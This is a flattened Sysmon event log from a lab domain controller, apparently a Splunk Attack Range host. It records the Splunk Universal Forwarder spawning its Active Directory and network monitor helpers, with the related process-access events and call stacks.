AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.640{59A5CD1D-9325-6005-CA04-00000000A301}31802188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.516{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 